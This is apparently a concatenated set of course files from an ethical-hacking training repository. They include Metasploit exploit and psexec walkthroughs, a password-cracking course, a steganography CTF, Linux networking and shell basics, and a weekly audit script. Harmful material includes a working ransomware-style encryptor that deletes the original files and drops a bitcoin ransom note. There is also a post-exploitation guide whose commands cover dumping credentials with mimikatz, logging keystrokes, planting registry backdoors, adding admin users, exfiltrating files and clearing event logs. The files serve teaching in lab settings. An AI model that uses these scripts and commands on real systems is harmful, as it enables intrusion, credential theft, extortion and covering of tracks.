works:** 94 | 95 | * Vulnerability in Windows Server service (`netapi32.dll`). 96 | * Allows **unauthenticated remote code execution** via malformed RPC requests. 97 | * Works well on older Windows 7 builds. 98 | 99 | **Lab Steps:** (Almost same as above) 100 | 101 | ```bash 102 | use exploit/windows/smb/ms08_067_netapi 103 | set RHOSTS 104 | set PAYLOAD windows/meterpreter/reverse_tcp 105 | set LHOST 106 | exploit 107 | ``` 108 | 109 | 110 | 111 | ## **3️⃣ psexec SMB Admin Access** 112 | 113 | **How it works:** 114 | 115 | * Not a vulnerability — but if weak credentials are found, you can log in remotely and run code. 116 | * Great for **lateral movement** exercises. 
117 | 118 | ```bash 119 | use exploit/windows/smb/psexec 120 | set RHOSTS 121 | set SMBUser administrator 122 | set SMBPass 123456 123 | set PAYLOAD windows/meterpreter/reverse_tcp 124 | set LHOST 125 | exploit 126 | ``` 127 | 128 | --- 129 | 130 | ## **4️⃣ IE Browser Exploits** 131 | 132 | **How it works:** 133 | 134 | * Host a malicious webpage with Metasploit. 135 | * Victim visits in IE 8/9 → exploit triggers. 136 | 137 | Example: 138 | 139 | ```bash 140 | use exploit/windows/browser/ie_execcommand_uaf 141 | set SRVHOST 142 | set URIPATH / 143 | set PAYLOAD windows/meterpreter/reverse_tcp 144 | set LHOST 145 | exploit 146 | ``` 147 | 148 | Then, get victim to visit: 149 | `http:///` 150 | 151 | ## **5️⃣ Local Privilege Escalation** 152 | 153 | **How it works:** 154 | 155 | * You already have a low-privilege account, and you exploit a kernel or service misconfiguration to become SYSTEM. 156 | 157 | Example: 158 | 159 | ```bash 160 | use exploit/windows/local/ms10_015_kitrap0d 161 | set SESSION 162 | exploit 163 | ``` 164 | -------------------------------------------------------------------------------- /projects/challenge-3.md: -------------------------------------------------------------------------------- 1 | ### **Guide: Challenge 3 - Hidden QR Code (Advanced Image Steganography)** 2 | 3 | #### **Scenario:** 4 | An underground hacking group shares sensitive information using images. The real message is hidden inside a **QR code** embedded within another image. 5 | 6 | Students must analyze the image, extract the QR code, and scan it to reveal the hidden message. 7 | 8 | --- 9 | 10 | ## **Step 1: Setup for Instructors (Creating the Hidden QR Code Image)** 11 | 12 | ### **1. Install QR Code Generator (Linux)** 13 | If you are on **Kali Linux or Ubuntu**, install `qrencode`: 14 | ```bash 15 | sudo apt install qrencode 16 | ``` 17 | 18 | ### **2. 
Generate a QR Code with a Secret Message** 19 | Create a **QR code** that contains a **hidden message or URL**: 20 | ```bash 21 | qrencode -o hidden_qr.png "https://pastebin.com/hiddenmessage" 22 | ``` 23 | This will generate `hidden_qr.png`, which contains the secret message. 24 | 25 | ### **3. Embed the QR Code Inside Another Image** 26 | To hide the QR code inside another image: 27 | 28 | #### **Method 1: Using GIMP (GUI-based)** 29 | 1. Open GIMP and load a **cover image** (e.g., `background.jpg`). 30 | 2. Drag & drop `hidden_qr.png` onto the cover image as a **new layer**. 31 | 3. Reduce the QR layer’s **opacity** slightly (or blend it into shadows). 32 | 4. Use the **clone tool** or **smudge tool** to distort it slightly. 33 | 5. Save the final image as `stego_image.png`. 34 | 35 | #### **Method 2: Using ImageMagick (CLI-based)** 36 | If you prefer command-line tools: 37 | ```bash 38 | composite -blend 90 hidden_qr.png background.jpg stego_image.png 39 | ``` 40 | This **blends** the QR code into the background image, making it harder to detect. 41 | 42 | --- 43 | 44 | ## **Step 2: Student Tasks (Extracting & Analyzing the Hidden QR Code)** 45 | 46 | ### **1. Open the Image in Stegsolve** 47 | Students will use **Stegsolve**, a Java-based tool for steganography analysis. 48 | 49 | #### **Install Stegsolve (Java Required)** 50 | 1. Download Stegsolve from: 51 | **https://github.com/zardus/ctf-tools/blob/master/stegsolve/install** 52 | 2. Run it: 53 | ```bash 54 | java -jar Stegsolve.jar 55 | ``` 56 | 57 | #### **Analyze the Image Using Color Planes** 58 | 1. **Open `stego_image.png`** in Stegsolve. 59 | 2. Click through the different **color planes** (Red, Green, Blue, Alpha). 60 | 3. **Look for patterns resembling a QR code**. 61 | 62 | ### **2. Extract & Scan the QR Code** 63 | Once students identify the QR code: 64 | 1. **Take a screenshot** of the QR code. 65 | 2. Use **zbarimg** (Linux) or a QR scanner app to decode it. 
#### **Extract with zbarimg (Linux)**
```bash
zbarimg extracted_qr.png
```
This will reveal the **hidden URL or message**.

#### **Extract with Online Tools**
If students extract the QR code manually, they can use:
- **ZXing Decoder**: [https://zxing.org/w/decode.jspx](https://zxing.org/w/decode.jspx)

---

## **Step 3: Challenge Variations & Advanced Tasks**

### **Variation 1: Encrypt the QR Code Before Hiding**
Instead of a plain URL, encrypt the QR content before generating the QR code (`--armor` keeps the ciphertext as ASCII text, which QR scanners can display):
```bash
echo "SecretMessage" | gpg --encrypt --armor --recipient "student@example.com" | qrencode -o encrypted_qr.png
```
Students must **decrypt the extracted QR code**.

### **Variation 2: Blend the QR Code Deeply**
Use **LSB steganography** to deeply embed the QR code inside the image using `stegify` (the payload is passed with `--data`):
```bash
stegify encode --carrier background.jpg --data hidden_qr.png --result deep_stego.png
```
Students must use `stegify decode` to extract it.

---

## **Final Challenge: CTF Format**
- **Red Team (Hackers):** Hide an encrypted QR code in an image.
- **Blue Team (Forensic Analysts):** Extract, decode, and analyze it.

Would you like **custom challenge hints or CTF flags** for students?

--------------------------------------------------------------------------------
/projects/new_johntherepper.md:
--------------------------------------------------------------------------------
John the Ripper (JtR) is a powerful open-source password cracking tool used by security professionals, ethical hackers, and penetration testers. This course will cover everything from basic usage to advanced techniques.
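As an added example for Modules 2 and 3 below (not part of the course material), the following Python script classifies hash strings by the Modular Crypt Format prefixes Module 2 lists, maps each to the name `john --format=` expects, and parses a pwdump/samdump2 line; every sample hash and the pwdump line are constructed stand-ins, not real credentials.

```python
"""Map password-hash strings to the John the Ripper --format name they need.

Added example for Modules 2 and 3 of the course (not part of the course
material). It classifies hashes by the Modular Crypt Format prefixes Module 2
lists and parses a pwdump/samdump2 line of the form user:rid:LM:NT:::.
All sample hashes below are constructed stand-ins, not real credentials.
"""
import re

# prefix -> (description, name accepted by `john --format=`)
MCF_PREFIXES = {
    "$1$": ("MD5-crypt", "md5crypt"),
    "$5$": ("SHA-256-crypt", "sha256crypt"),
    "$6$": ("SHA-512-crypt", "sha512crypt"),
    "$2a$": ("bcrypt", "bcrypt"),
    "$2b$": ("bcrypt", "bcrypt"),
    "$2y$": ("bcrypt", "bcrypt"),
}
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
# Well-known LM hash of the empty password: present when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def identify_hash(value: str):
    """Return (description, john_format); (None, None) if the shape is unknown.

    A bare 32-hex-digit string is ambiguous: NTLM and raw MD5 look identical,
    so both candidates are returned and the analyst must pick from context
    (a SAM dump means NTLM, a web-app user table usually means raw MD5).
    """
    value = value.strip()
    for prefix, info in MCF_PREFIXES.items():
        if value.startswith(prefix):
            return info
    if HEX32.match(value):
        return ("NTLM or raw MD5 (32 hex digits, ambiguous)", "nt or raw-md5")
    return (None, None)


def parse_pwdump_line(line: str) -> dict:
    """Parse 'user:rid:LMhash:NThash:::' as written by samdump2/pwdump."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not HEX32.match(parts[2]) or not HEX32.match(parts[3]):
        raise ValueError(f"not a pwdump line: {line!r}")
    lm, nt = parts[2].lower(), parts[3].lower()
    return {"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
            "lm_disabled": lm == EMPTY_LM}


def group_by_format(hashes) -> dict:
    """Group hash strings by the --format each one needs.

    John cracks one format per run, so a mixed file must be split; the
    returned dict shows which lines belong in which input file.
    """
    groups = {}
    for h in hashes:
        _, fmt = identify_hash(h)
        groups.setdefault(fmt or "unknown", []).append(h)
    return groups


# Constructed samples (only the prefix/shape matters; the digests are not real).
SAMPLE_HASHES = [
    "$1$saltsalt$" + "x" * 22,
    "$6$rounds=5000$saltsalt$" + "y" * 86,
    "$2a$10$" + "z" * 53,
    "31d6cfe0d16ae931b73c59d7e0c089c0",   # NT hash of the empty password
]
# Constructed samdump2-style line: LM disabled, empty NT password.
SAMPLE_PWDUMP = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"

if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        print(f"{h[:24]:<26} -> {identify_hash(h)}")
    print(parse_pwdump_line(SAMPLE_PWDUMP))
    print(group_by_format(SAMPLE_HASHES))
```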
---

# **Course: Cracking Password Hashes with John the Ripper**

## **Module 1: Introduction to John the Ripper**
### **1.1 What is John the Ripper?**
- Overview of John the Ripper (JtR)
- Use cases: Ethical hacking, pentesting, security audits
- Supported operating systems (Linux, macOS, Windows)

### **1.2 Installation**
- Installing on Linux:
```bash
sudo apt update && sudo apt install john
```
or
```bash
git clone https://github.com/openwall/john.git
cd john/src && ./configure && make -s clean && make -sj4
```
- Installing on Windows (using Cygwin)
- Installing on macOS (via Homebrew):
```bash
brew install john
```
- Verifying installation:
```bash
john --help
```

---

## **Module 2: Understanding Hashes**
### **2.1 Types of Hashes**
- Common password hash formats:
  - **MD5** (`$1$`)
  - **SHA-256** (`$5$`)
  - **SHA-512** (`$6$`)
  - **bcrypt** (`$2a$`)
  - **NTLM** (`Windows hashes`)
  - **LM** (legacy Windows hashes)

### **2.2 Identifying Hashes**
- Listing the hash formats JtR supports (these are the names used with `--format=`):
```bash
john --list=formats
```
- Using the `hashid` or `hash-identifier` tool:
```bash
hashid
```

---

## **Module 3: Cracking Hashes with John the Ripper**
### **3.1 Basic Cracking**
- Cracking a single hash:
```bash
john --format= --wordlist=
```
Example:
```bash
john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

- Cracking multiple hashes:
```bash
john hashes.txt
```

### **3.2 Brute Force Attacks**
- Using brute force (incremental mode):
```bash
john --incremental hash.txt
```
- Specifying character sets:
```bash
john --incremental=digits hash.txt
```

### **3.3 Dictionary Attacks**
- Using a wordlist:
```bash
john --wordlist=/path/to/wordlist.txt hash.txt
```
- Common wordlists:
  - **RockYou** (`/usr/share/wordlists/rockyou.txt`)
  - **SecLists** (GitHub repository with various wordlists)

### **3.4 Mask Attacks (Optimized Brute Force)**
- Using custom masks:
```bash
john --mask=?l?l?l?l?l?l?l hash.txt
```
  - `?l` = lowercase letters
  - `?u` = uppercase letters
  - `?d` = digits
  - `?s` = special characters

### **3.5 Rules-Based Attacks**
- Using pre-defined rule sets:
```bash
john --wordlist=rockyou.txt --rules hash.txt
```

---

## **Module 4: Cracking Windows Passwords**
### **4.1 Extracting Windows Hashes**
- Dumping NTLM hashes using `samdump2`:
```bash
samdump2 SYSTEM SAM > hashes.txt
```
- Using `mimikatz` or `pwdump` tools

### **4.2 Cracking NTLM Hashes**
- Running JtR on NTLM hashes:
```bash
john --format=nt hash.txt
```

---

## **Module 5: Advanced Techniques**
### **5.1 Cracking Online Passwords**
- Cracking SSH password hashes
- Capturing and cracking WPA2 Wi-Fi passwords
- Cracking ZIP file passwords:
```bash
zip2john protected.zip > hash.txt
john hash.txt
```

### **5.2 Using External Tools with John**
- Using `hashcat` alongside JtR
- Combining JtR with Hydra for online attacks

### **5.3 Customizing JtR**
- Writing custom rule files (`john.conf`)
- Optimizing performance with OpenMP

--------------------------------------------------------------------------------
/Ransomware-Project(groupC).md:
--------------------------------------------------------------------------------
# Webdeves Ethical Hacking Project
# Ransomware Simulator Project (Ethical Hacking Lab)

## Objective
Simulate a ransomware attack in a controlled environment to understand how file encryption and ransom messages work.

## Project Structure
```
ransomware_simulator/
│
├── encryptor.py        # Script to encrypt files and drop ransom note
├── decryptor.py        # Script to decrypt files with a key
├── key.key             # Generated encryption key
├── ransom_note.txt     # Template ransom message (used in script)
├── demo_files/         # Test files that will be encrypted
└── README.md           # Instructions and documentation
```

- Only run this in **virtual machines**.
- Use only the `demo_files/` folder with dummy/test files.
- Never target system folders or real documents.
- Understand the legal and ethical implications before testing.

## Getting Started

### Step 1: Setup Environment
- Python 3.7+
- Install dependencies:
```bash
pip install cryptography
```
- Create test files in the `demo_files/` folder (e.g. `.txt`, `.docx`, `.jpg`)

### Step 2: Run Encryptor
```bash
python encryptor.py
```
This will:
- Encrypt all files in `demo_files/`
- Replace originals with `.enc` files
- Create a ransom note called `README.txt`

### Step 3: Decryption
You’ll use the `decryptor.py` script and the `key.key` file to recover the original files. This simulates what happens when a victim "pays the ransom".
## decryptor.py (To be added)
Your script will:
- Load the `key.key` file
- Decrypt each `.enc` file in the folder
- Recreate the original files

## Learning Outcomes
- Understand how ransomware operates
- Learn file encryption/decryption using `cryptography`
- Explore defense mechanisms and detection strategies
- Discuss ethical and legal implications of malware simulation

## Extension Ideas
- Add a GUI popup with countdown timer
- Simulate file extension hiding
- Add basic persistence (autostart simulation)
- Build a basic ransomware detector script (blue team exercise)

## Submission Checklist
- [ ] `encryptor.py` script completed
- [ ] `decryptor.py` script created
- [ ] Test run and screenshot of encrypted files
- [ ] Report (1 page): What you learned + detection methods

## Ethics Reminder
This project is for educational cybersecurity use only. Misusing this knowledge is illegal and unethical. Respect privacy, security, and laws at all times.
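As an added example for the "basic ransomware detector script" extension idea (not one of the project's own scripts), here is a standard-library-only Python check that looks for the traces `encryptor.py` leaves in `demo_files/`: files renamed to `.enc`, ciphertext-like content, and the dropped `README.txt`. The demo folder it builds is constructed test data, and the `.enc` content stands in for a Fernet token, which is base64, so the entropy check decodes base64 before measuring.

```python
"""Blue-team check for the ransomware simulator's demo_files/ folder.

Added example for the 'basic ransomware detector script' extension idea; it is
not one of the project's own scripts and uses only the standard library. It
looks for the three traces encryptor.py leaves: files renamed to *.enc, file
contents that look like ciphertext, and the dropped README.txt ransom note.
"""
import base64
import math
import os
import re
import tempfile
from collections import Counter

RANSOM_NOTE_NAME = "README.txt"
# Phrases from the simulator's ransom note; a real detector would load a signature list.
RANSOM_MARKERS = ("YOUR FILES HAVE BEEN ENCRYPTED", "send 1 BTC")
SUSPICIOUS_EXT = ".enc"
# Bits per byte: English text is roughly 4-5; compressed or encrypted data approaches 8.
ENTROPY_THRESHOLD = 7.0
MIN_SIZE = 64                      # tiny files give meaningless entropy estimates
_B64 = re.compile(rb"^[A-Za-z0-9_\-]+={0,2}$")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def ciphertext_entropy(data: bytes) -> float:
    """Entropy of the payload, looking through base64 armour.

    Fernet tokens (what encryptor.py writes) are urlsafe-base64 text, whose
    entropy can never exceed log2(64) = 6 bits/byte, so the raw token would
    slip under an 8-bit-oriented threshold. Decoding first restores the
    underlying ciphertext's near-8-bit entropy.
    """
    stripped = data.strip()
    if _B64.match(stripped) and len(stripped) % 4 == 0:
        try:
            return shannon_entropy(base64.urlsafe_b64decode(stripped))
        except ValueError:          # binascii.Error is a ValueError
            pass
    return shannon_entropy(data)


def scan_folder(folder: str) -> dict:
    """Collect ransomware indicators from one folder and return a report dict."""
    report = {"enc_files": [], "high_entropy": [], "note_found": False}
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        if name == RANSOM_NOTE_NAME:
            text = data.decode("utf-8", errors="replace")
            report["note_found"] = any(m in text for m in RANSOM_MARKERS)
            continue
        if name.endswith(SUSPICIOUS_EXT):
            report["enc_files"].append(name)
        if len(data) >= MIN_SIZE and ciphertext_entropy(data) >= ENTROPY_THRESHOLD:
            report["high_entropy"].append(name)
    # Require two independent indicators so a single odd file does not raise an alert.
    hits = sum([bool(report["enc_files"]), bool(report["high_entropy"]), report["note_found"]])
    report["verdict"] = "RANSOMWARE_SUSPECTED" if hits >= 2 else "clean"
    return report


def build_demo_folder() -> str:
    """Create a constructed demo_files/ snapshot mimicking the state after encryptor.py ran."""
    folder = tempfile.mkdtemp(prefix="demo_files_")
    # A plain-text file the simulator skipped (low entropy, not base64).
    with open(os.path.join(folder, "notes.txt"), "w") as fh:
        fh.write("Meeting notes: review the quarterly budget and the patch schedule.\n" * 4)
    # Ciphertext stand-in: 4096 bytes with every byte value equally frequent, base64-wrapped like a Fernet token.
    fake_cipher = bytes(i % 256 for i in range(4096))
    with open(os.path.join(folder, "budget.xlsx.enc"), "wb") as fh:
        fh.write(base64.urlsafe_b64encode(fake_cipher))
    with open(os.path.join(folder, RANSOM_NOTE_NAME), "w") as fh:
        fh.write("--- YOUR FILES HAVE BEEN ENCRYPTED ---\nTo recover your data, send 1 BTC ...\n")
    return folder


if __name__ == "__main__":
    result = scan_folder(build_demo_folder())
    for key, value in result.items():
        print(f"{key}: {value}")
```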
## encryptor.py

```python
from cryptography.fernet import Fernet
import os, glob

# Create and store encryption key
key = Fernet.generate_key()
with open("key.key", "wb") as f:
    f.write(key)

fernet = Fernet(key)

# Folder containing files to simulate encryption
folder = "demo_files/"
os.makedirs(folder, exist_ok=True)

# Encrypt all files in folder
for filepath in glob.glob(folder + "*"):
    # Skip directories, already-encrypted files and the ransom note itself
    if not os.path.isfile(filepath):
        continue
    if filepath.endswith(".enc") or filepath.endswith("README.txt"):
        continue
    with open(filepath, "rb") as f:
        data = f.read()
    encrypted = fernet.encrypt(data)
    with open(filepath + ".enc", "wb") as f:
        f.write(encrypted)
    os.remove(filepath)

# Drop ransom note
ransom_note = """
--- YOUR FILES HAVE BEEN ENCRYPTED ---
To recover your data, send 1 BTC to the following address:
1A2b3C4d5E6f7G8h9I0j
Then contact us with proof of payment.
You have 48 hours before your files are lost forever.
"""

with open(folder + "README.txt", "w") as f:
    f.write(ransom_note)

print("[+] Files encrypted. Ransom note dropped.")
```

--------------------------------------------------------------------------------
/projects/post-exploitation.md:
--------------------------------------------------------------------------------
Once you have gained access to a Windows machine using Metasploit and Meterpreter, post-exploitation involves leveraging that access to extract information, escalate privileges, maintain persistence, and move laterally within the network.

### **1. Gaining Access to a Windows System**
Before post-exploitation, you need an active Meterpreter session, typically obtained using:
- Exploiting a vulnerability (e.g., MS17-010 EternalBlue)
- Using a malicious payload (e.g., `windows/meterpreter/reverse_tcp`)
- Social engineering (e.g., phishing, malicious USB drop)

To check active sessions:
```bash
msfconsole
sessions -l
```
To interact with a session:
```bash
sessions -i
```

---

## **Post-Exploitation Techniques**

### **2. System Enumeration**
Gather system details:
```bash
sysinfo
```
Get user details:
```bash
getuid
```
List running processes:
```bash
ps
```
Check network interfaces:
```bash
ifconfig
```
Retrieve environment variables:
```bash
getenv
```
Dump credentials (if running as SYSTEM):
```bash
hashdump
```

---

### **3. Privilege Escalation**
If the current user lacks administrative privileges, escalate using:
```bash
getsystem
```
If `getsystem` fails, try local privilege escalation exploits:
```bash
use exploit/windows/local/bypassuac
set SESSION
exploit
```
Check for misconfigurations that allow privilege escalation:
```bash
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
```

---

### **4. Maintaining Persistence**
#### **Method 1: Creating a New User**
```bash
execute -f cmd.exe -i -H
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add
```

#### **Method 2: Registry Persistence**
Add a registry entry to auto-start Meterpreter:
```bash
reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d "C:\\Users\\Public\\backdoor.exe"
```

#### **Method 3: Service Persistence**
```bash
run persistence -X -i 30 -p 4444 -r
```

---

### **5. Credential Dumping**
Extract stored credentials using Mimikatz:
```bash
load mimikatz
wdigest
kerberos
```
Dump credentials from LSASS:
```bash
run post/windows/gather/credentials/mimikatz
```

---

### **6. Capturing Keystrokes**
```bash
keyscan_start
```
To view captured keystrokes:
```bash
keyscan_dump
```
Stop keylogging:
```bash
keyscan_stop
```

---

### **7. Capturing Screenshots**
```bash
screenshot
```

---

### **8. Exfiltrating Files**
Download a file from the target:
```bash
download C:\\Users\\victim\\Desktop\\passwords.txt
```
Upload a file:
```bash
upload backdoor.exe C:\\Users\\Public\\backdoor.exe
```

---

### **9. Lateral Movement**
Pivot to another machine using a captured credential:
```bash
use exploit/windows/smb/psexec
set RHOST
set SMBUser
set SMBPass
exploit
```

---

### **10. Clearing Tracks**
Delete event logs:
```bash
clearev
```
Remove history:
```bash
rm -rf C:\\Windows\\Prefetch\\*
```

---

## **Defensive Measures**
Organizations can mitigate these attacks by:
- Applying patches (e.g., disable SMBv1)
- Using endpoint protection (EDR/XDR)
- Enabling Windows Defender Attack Surface Reduction (ASR)
- Implementing least privilege access
- Monitoring logs and PowerShell activity

--------------------------------------------------------------------------------
/shell_week/weekly_audit_report.md:
--------------------------------------------------------------------------------
## Project: Weekly Audit Report Generator

### **Goal:**

Create a **Bash script** that:

* Runs a security audit
* Saves the results to `/var/log/security-audit.log`
* Is scheduled to run **weekly** via cron

## Step-by-Step Guide

### **Step 1: Script Outline**

Create a file named:

```bash
sudo nano /usr/local/bin/weekly-audit.sh
```

Add the following shebang line:

```bash
#!/bin/bash
```

### **Step 2: Create Log Directory & File**

Add this to the top of the script to define the log file path:

```bash
LOGFILE="/var/log/security-audit.log"
DATE=$(date '+%Y-%m-%d %H:%M:%S')

echo "===== Security Audit Report - $DATE =====" >> "$LOGFILE"
```

### **Step 3: Check Open Ports**

Use `ss`, `netstat`, or `nmap` (choose based on availability):

```bash
echo -e "\n[Open Ports - ss]" >> "$LOGFILE"
ss -tuln >> "$LOGFILE" 2>/dev/null

# Optional: if nmap is installed
# echo -e "\n[Open Ports - nmap]" >> "$LOGFILE"
# nmap -sT -O localhost >> "$LOGFILE" 2>/dev/null
```

### **Step 4: List Users with UID 0 (Superusers)**

```bash
echo -e "\n[Users with UID 0]" >> "$LOGFILE"
awk -F: '($3 == 0) {print $1}' /etc/passwd >> "$LOGFILE"
```

---

### **Step 5: Find SUID and SGID Files**

```bash
echo -e "\n[SUID Files]" >> "$LOGFILE"
find / -perm -4000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE"

echo -e "\n[SGID Files]" >> "$LOGFILE"
find / -perm -2000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE"
```

---

### **Step 6: Add Summary and End**

```bash
echo -e "\n[Summary]" >> "$LOGFILE"
echo "Audit completed on $DATE" >> "$LOGFILE"
echo "==========================================" >> "$LOGFILE"
```

---

### **Step 7: Make the Script Executable**

```bash
sudo chmod +x /usr/local/bin/weekly-audit.sh
```

---

## 📆 Step 8: Schedule the Script with Cron (Weekly)

Open the root user's crontab:

```bash
sudo crontab -e
```

Add the following line to run every Sunday at 2 AM:

```bash
0 2 * * 0 /usr/local/bin/weekly-audit.sh
```

---

## 🔐 Step 9: Set Permissions (Secure the Log)

Make sure only root can read the log:

```bash
sudo touch /var/log/security-audit.log
sudo chown root:root /var/log/security-audit.log
sudo chmod 600 /var/log/security-audit.log
```

---

## ✅ Optional: Email Report (Bonus)

If your system has `mail` installed and configured:

```bash
mail -s "Weekly Security Audit Report" you@example.com < /var/log/security-audit.log
```

---

## 📁 Full Script Summary

Here's the complete version:

```bash
#!/bin/bash
LOGFILE="/var/log/security-audit.log"
DATE=$(date '+%Y-%m-%d %H:%M:%S')

echo "===== Security Audit Report - $DATE =====" >> "$LOGFILE"

echo -e "\n[Open Ports - ss]" >> "$LOGFILE"
ss -tuln >> "$LOGFILE" 2>/dev/null

echo -e "\n[Users with UID 0]" >> "$LOGFILE"
awk -F: '($3 == 0) {print $1}' /etc/passwd >> "$LOGFILE"

echo -e "\n[SUID Files]" >> "$LOGFILE"
find / -perm -4000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE"

echo -e "\n[SGID Files]" >> "$LOGFILE"
find / -perm -2000 -type f -exec ls -lh {} \; 2>/dev/null | awk '{print $NF}' >> "$LOGFILE"

echo -e "\n[Summary]" >> "$LOGFILE"
echo "Audit completed on $DATE" >> "$LOGFILE"
echo "==========================================" >> "$LOGFILE"
```

--------------------------------------------------------------------------------
/week2/day2_tcp.md:
--------------------------------------------------------------------------------
### **Understanding TCP/IP in Linux**

The **TCP/IP (Transmission Control Protocol/Internet Protocol)** suite is the foundation of internet communications. It defines the standards and protocols that allow devices to connect, exchange data, and communicate over networks. In Linux, TCP/IP networking is a core functionality that enables seamless connectivity and data transmission.

---

### **Why is TCP/IP Important in Linux?**
1. **Data Communication**: Facilitates reliable data transfer between systems.
2. **Networking Basics**: Forms the basis for local and global communication over the internet or intranet.
3. **Interoperability**: Allows Linux systems to interact with other platforms like Windows and macOS.
4. **Troubleshooting**: Understanding TCP/IP helps in diagnosing and fixing network issues.
---

### **The TCP/IP Model and Its Layers**

The TCP/IP model is organized into four layers, each with distinct responsibilities:

1. **Network Interface Layer**
   - Handles physical and data link communication with hardware (e.g., Ethernet, Wi-Fi).
   - Examples: Device drivers, network adapters.

2. **Internet Layer**
   - Manages IP addressing, routing, and packet forwarding.
   - Protocols: **IP (IPv4/IPv6), ICMP, ARP**.

3. **Transport Layer**
   - Moves data between systems using protocols like:
     - **TCP (Transmission Control Protocol)**: Reliable, connection-oriented.
     - **UDP (User Datagram Protocol)**: Unreliable, connectionless.
   - TCP additionally ensures data is delivered in order and without errors.

4. **Application Layer**
   - Provides services and protocols for end-user applications.
   - Examples: HTTP, FTP, SMTP, DNS.

---

### **Basic Linux TCP/IP Commands**

1. **View Active TCP/IP Connections**
   ```bash
   netstat -at
   ```
   - Lists all active TCP connections.
   - **Alternative** (modern):
   ```bash
   ss -at
   ```

2. **Check IP Configuration**
   ```bash
   ip addr
   ```
   - Displays IP addresses assigned to network interfaces.
   - **Alternative**:
   ```bash
   ifconfig
   ```

3. **Test Connectivity**
   ```bash
   ping [hostname or IP]
   ```
   - Checks if a remote host is reachable.

4. **Trace Route of Packets**
   ```bash
   traceroute [hostname or IP]
   ```
   - Tracks the path packets take to a destination.

5. **View Routing Table**
   ```bash
   ip route
   ```
   - Displays network routes and gateways.

6. **Send/Receive Data**
   - Using `curl` or `wget` to interact with servers over HTTP/HTTPS:
   ```bash
   curl https://example.com
   wget https://example.com
   ```

---

### **Practical Example: Using TCP/IP Commands**

1. **Check Open Ports Using `netstat`**:
   ```bash
   netstat -tuln
   ```
   - Displays TCP and UDP listening ports (add `-p` to include the owning process IDs).

2. **Diagnose Connectivity with `ping`**:
   ```bash
   ping google.com
   ```
   - Sends packets to `google.com` and checks if it responds.

3. **Monitor Network Traffic Using `tcpdump`**:
   ```bash
   sudo tcpdump -i eth0
   ```
   - Captures and displays TCP/IP packets on a specific interface.

---

### **Why Master TCP/IP in Linux?**
- **Networking Proficiency**: Helps in configuring and managing Linux servers.
- **Troubleshooting Skills**: Identifying network issues becomes straightforward.
- **Secure Systems**: Better understanding of protocols like TCP/IP aids in securing Linux systems.

Mastering TCP/IP on Linux equips you with the skills needed to handle complex networking tasks, ensuring smooth communication and system management.

--------------------------------------------------------------------------------
/week3/redirect_shell.md:
--------------------------------------------------------------------------------
# **Redirection in Shell Basics**

In **Linux**, redirection allows you to **control where input comes from and where output goes**. By default, a command takes input from the keyboard and outputs to the terminal. However, we can **redirect** this input and output to files or other commands.

---

## **1. Understanding Input & Output Streams**
Every process in Linux has three standard data streams:

| **Stream** | **Description** | **File Descriptor** | **Default Destination** |
|------------|----------------|---------------------|-------------------------|
| **Standard Input (stdin)** | Input to a command | `0` | Keyboard |
| **Standard Output (stdout)** | Normal output from a command | `1` | Terminal (screen) |
| **Standard Error (stderr)** | Error messages | `2` | Terminal (screen) |

---

## **2. Output Redirection (`>` and `>>`)**
### **a. Redirecting Standard Output (`>`)**
Redirects output to a file, **overwriting** it if the file exists.

#### **Example:**
```bash
ls > files.txt
```
- This stores the output of `ls` in `files.txt`, **overwriting** any previous content.

#### **Verify by reading the file:**
```bash
cat files.txt
```

---

### **b. Appending Output (`>>`)**
Redirects output to a file, but **appends** instead of overwriting.

#### **Example:**
```bash
echo "New line added" >> files.txt
```
- This **adds** `"New line added"` to `files.txt` without removing existing content.

> **Activity:** Try using `>` and `>>` to see the difference.

---

## **3. Input Redirection (`<`)**
Redirects a file’s content as input to a command.

#### **Example:**
```bash
sort < files.txt
```
- The `sort` command reads **input from `files.txt`** instead of the keyboard.

> **Activity:** Create a file with multiple lines, then use `sort < filename` to sort its contents.

---

## **4. Redirecting Error Messages (`2>` and `2>>`)**
### **a. Redirecting Errors (`2>`)**
Redirects **stderr** to a file, overwriting it.
#### **Example:**
```bash
ls /wrongpath 2> error.log
```
- Any error messages from `ls /wrongpath` go into `error.log`.

---

### **b. Appending Errors (`2>>`)**
Appends error messages instead of overwriting.

#### **Example:**
```bash
ls /anotherwrongpath 2>> error.log
```
- Errors from `ls /anotherwrongpath` are **added** to `error.log`.

> **Activity:** Try running commands that produce errors and redirect them.

---

## **5. Redirecting Both Output & Errors (`&>` and `2>&1`)**
### **a. Redirecting Both (`&>`)**
Redirects **stdout and stderr** to the same file.

#### **Example:**
```bash
ls /correct /wrongpath &> output.log
```

---

### **b. Redirecting Errors to Standard Output (`2>&1`)**
Sends stdout to the file first, then makes stderr (`2`) a copy of stdout (`1`), so both streams end up in the file. The order matters: `2>&1` copies wherever `1` points at that moment, so writing it before `> output.log` would leave errors on the terminal.

#### **Example:**
```bash
ls /correct /wrongpath > output.log 2>&1
```

> **Activity:** Experiment with `&>` and `2>&1` to see how errors and output are handled.

---

## **6. Piping (`|`) - Redirecting Output to Another Command**
Pipes (`|`) send output from one command as input to another.

#### **Example:**
```bash
ls | grep ".txt"
```
- The `ls` command lists files, and `grep` filters `.txt` files.

> **Activity:** Try `ps aux | grep bash` to find all running Bash processes.

---

## **7. Null Redirection (`/dev/null`) - Discarding Output**
`/dev/null` is a special file that **discards** anything written to it.

